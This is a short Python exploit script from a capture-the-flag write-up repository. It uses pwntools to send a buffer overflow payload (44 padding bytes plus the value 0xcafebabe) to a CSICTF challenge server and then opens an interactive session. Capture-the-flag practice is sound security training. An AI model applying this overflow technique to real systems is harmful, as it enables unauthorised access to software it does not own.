CSICTF-Writeups/Pwn/pwn intended 0x2/rev_exploit.py

11 lines
154 B
Python
Raw Normal View History

2020-07-31 18:24:27 +05:30
#!/usr/bin/env python3
import pwn
r = pwn.remote('chall.csivit.com', 30007)
payload = "A"*44 + '\xbe\xba\xfe\xca'
r.sendline(payload)
r.interactive()